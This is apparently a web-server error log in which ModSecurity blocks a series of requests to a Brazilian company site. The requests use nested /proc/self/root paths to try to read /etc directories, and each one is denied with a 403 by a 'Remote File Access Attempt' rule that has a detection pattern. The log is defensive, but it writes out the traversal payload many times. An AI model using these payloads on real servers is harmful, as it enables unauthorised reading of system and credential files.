https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:30.661291 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:38296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyggbLMZ6AikZjR9UxogAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:34.472551 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:38312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyhta6ubjKNq_cu4YXiQAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:38.182535 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:38320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyiNa6ubjKNq_cu4YXjQAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:39.832909 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:47938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyiwkwaGbbGflqUZCLAgAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:42.307554 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:47950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyjgbLMZ6AikZjR9UxqwAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:43.634997 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:47958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyjwkwaGbbGflqUZCLBAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:45.147064 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:47974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuykcdf6f5d65gmYZRH5QAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:46.458236 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:47980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuykhkFeYa1D6dYQnDDNQAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:47.770258 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:47986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyk_u8EFLIOrSqIptzgQAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:49.087465 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:47998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuylcdf6f5d65gmYZRH7AAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:51.415155 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:41802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuylwkwaGbbGflqUZCLCgAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:52.751500 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:41806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuymOyqAr6etmhZHNo4MwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:54.099279 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:41810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuymta6ubjKNq_cu4YXkgAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:58.661551 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.243.128:41824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyngbLMZ6AikZjR9UxugAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:59.175869 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.243.128:41824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuynwbLMZ6AikZjR9UxuwAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:00.475786 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:53574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyoF_V7PWP6ixUYl6QBQAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:01.481500 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.241.31:59774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyofu8EFLIOrSqIptzkgAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:24:01.959162 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.243.128:53590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyoRkFeYa1D6dYQnDDOAAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:03.309260 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:53606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyoxkFeYa1D6dYQnDDOQAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:04.622144 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:53618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuypNa6ubjKNq_cu4YXmwAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:05.979673 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:53626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuypfu8EFLIOrSqIptzlwAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:24:08.452211 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:53634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuypwkwaGbbGflqUZCLDQAAAMc"], referer: 